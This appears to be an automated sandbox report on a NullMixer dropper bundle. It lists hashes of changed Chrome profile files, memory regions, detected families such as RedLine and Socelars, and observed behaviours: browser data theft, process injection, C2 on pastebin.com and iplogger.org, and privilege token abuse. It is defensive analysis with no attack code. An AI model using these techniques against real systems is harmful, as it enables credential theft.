SHA512 10026fe88d516a89e104e12bbf723ccc4d88bd4b5dcd8b64fa0a559bf442a9f6f945bb28e020f6b07d70536cc867237d059986dd44fd57290215a77dc7b116c0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f1b2c62be166be024b07e35637b79e4f
SHA1 2ce73344d13b2425af392ba53c52e8e0831288a9
SHA256 1bd4a5024a9a2a6fe0d89f9bc27fda28b0035bb7e2173858ea6bae5f94ceeb3f
SHA512 cf31c033e41045731fdb68249c5bb7b85e9eb5dc833f8ca9af4f6bd262143787d0e43baa19e13ec86c6fa305ae8227142f0b9fd35889bc5a80ff529bad32bf94

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c5b9037cae3a37536d74fdff24775174
SHA1 a81205140fb8a903cb6216622944f1acd2dd7ebc
SHA256 9c6561cf00c0dde3a580f5094a73b9a11c16de621f544175d1511382381ec879
SHA512 cff0701905ace421943dad7b0d1acf2d2039680cecec4c359751059d47b613c1762b46e02e79e0075c664ca6119c81e09a8eaea84086145abcce7aee8d40cf95

memory/1760-330-0x0000000000400000-0x000000000089C000-memory.dmp

memory/3324-328-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3324-329-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/212-333-0x0000000000400000-0x00000000005A8000-memory.dmp

memory/4872-332-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4564-331-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3324-343-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3324-352-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3324-351-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3324-350-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3324-349-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3324-347-0x000000006EB40000-0x000000006EB63000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 47931ca78e1df6af7ee560e2c7a149bc
SHA1 e7088a39c61827ab3eeadd4bd04c2305fe558ced
SHA256 f796e0a0095c46301bd0380340f2a441b4a72c035737c528aee2254c13030ca8
SHA512 3afcf893d3c9315f03396517ee56d6776778cb9d0c4eb38b85737a006fe17b67096c09bc0085c172ad4caae7a9f25c5508761f383a3b885bf6af514976180cce

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 06de0682337720f0fdb26abe83d9a52f
SHA1 d2e94d376b1d06c21dfcb3edde3a28a29f6e60fe
SHA256 26b0875aefe31f5063a43fcbb8232926f8d9fadcbd98d937473b78f98221d797
SHA512 1901d163d547f274d8efc6a1f851aaf61c31390f987ed7048ff89d34974183e57465673f85f68ef86ffaa67f2ff62e1157b296f85c77c64d4c05582bdcb64b32

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 61a398a0c7b7478af04e558a0d959fee
SHA1 cff0a52eb83eb8f7f42507e3dbbd880fad43bacd
SHA256 fd205c9937a714e984d3097c9542cbb179e328266b5c3d45731b0eb28668a90d
SHA512 7e618c40496484d00bb5e053c9a98c93b45ce57b1fd742b7250a10202dbf270ffd961e534575138bd1ebed8970e4ea189e88c59550c3c304f13ba27e72797d92

memory/212-385-0x00000000030A0000-0x0000000003132000-memory.dmp

memory/212-386-0x0000000003140000-0x0000000004EEF000-memory.dmp

memory/212-387-0x0000000004EF0000-0x0000000004F7C000-memory.dmp

memory/212-389-0x0000000004F90000-0x0000000005019000-memory.dmp

memory/212-388-0x0000000004F90000-0x0000000005019000-memory.dmp

memory/212-391-0x0000000004F90000-0x0000000005019000-memory.dmp

memory/212-392-0x00000000009C0000-0x00000000009C1000-memory.dmp

memory/212-393-0x00000000009D0000-0x00000000009D4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 85e45dc522a5043c82932622ef5e31d2
SHA1 d38b8bff91168f0d313bed36bd4e23542f692789
SHA256 5911f1982bef5a2e1bb37d5db9279399b9e8bf2c81585314f8ee09bd92be96c0
SHA512 6d763fdbdeb36eff0e8f8b96070ae692cd48126aec8d4ae01a5586f6b57e38ec45f628bf307b36bd6d3224f9eb5be03d2c423fd1c94def4bedb530a15af01674

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\0a05a4c4-4387-4216-85bf-2b67f34d5ab3.tmp

MD5 b20aa8e4bde869a684cfd9615f24d705
SHA1 c0c22cff2ee8aabc2491ced7685ba688efb60d93
SHA256 ddaf6da77d383d881af7606164b9a158ac94f8fa6567cd9e44486cc056d036af
SHA512 6a0052f2d03f7e0f5397d8f37aef988e6308c5d6220c38884b805b2ba868a15bd80556bef92ac28a076f3e1166e970a38cc3ad8b244ab763582e8f75d1565b40

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 bae97f3540b42018c48b9190a6667241
SHA1 34bf0a682a36c8706294775b75473ed5d2f9cb3d
SHA256 c1dbd514548ce4508956233ed12fd9c21d159629cdb3ab7e50655e60a544c71e
SHA512 50b95be72030d93e11302736b496171f566a71aade1d5ff21ec0d4128e38a3ca5be2b11414c38867f95cbc1c5fba31b1936438405348d21ce3b9eacf749e04af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 89fdc8903fec34e96d29447f2a1d4746
SHA1 a9648c31eb965e79cdb9c7b56c0573a87b1eb907
SHA256 4bdeada67eb776c1ba8f0411ed3fde36ec617173b14c359c58cdf5e02ffb6f39
SHA512 1ec84f67b7d20c5d4e74319a8756012c229b83c7e3d65d695c376b3ed7e40fe80fcfaf7d35a380cd73e245948f54caed3be302c1a78f3d2c20d9d82e5ee9b3a5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 800fe7cc177c98a66706e568913495e7
SHA1 5d3c3fb81a8358166b3859c02c0b5df6b857c73c
SHA256 ae580a0820d0491329b07aa507da7ff32b10b5f0596e80e183815e6b7fa7ffb8
SHA512 f5777e9bed97f8559dd99b140a8d3aff73b56dc76cbaad737174dcfcdabca9a1998cb2dfb00e52e1c258bd9538d6426488d4b320a802e09256b7cfc5b882108b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e8095a2dd185e0447c41514410b2eb02
SHA1 0889f63582023375cbdbaa063cae13beaebcfbfe
SHA256 24a93ca19d929010c2a5b64f1b37713ea1ef79c8492821c6d13d41efb2c69dc2
SHA512 38c312b916e7598241f6a2b6d4b6748ac071e86d9a8fb27244390844631c5d531874339e26c97039b4611b279082f285e9cd71c0acd498a79d0d4cf5e7c1d0f5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 fd316b6f7e242a76d78ab5d5f1b5ad24
SHA1 f4e3bf1dd4bb56e3d061446fa82dd0a613a46648
SHA256 d5430cdc7b935c17857e20665b997ec73d26ad2ffa0d262081ea2f783ff42db9
SHA512 83cd524287d17d79f4290b7fcd290491e127150066d6828fac9b2868ddf93613114fa31f04dbce679fe4309377cebd9f9b83a5e43cc6e4222ee1a459f27c6909

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-23 18:41

Reported

2024-11-23 18:43

Platform

win7-20241023-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1624 set thread context of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
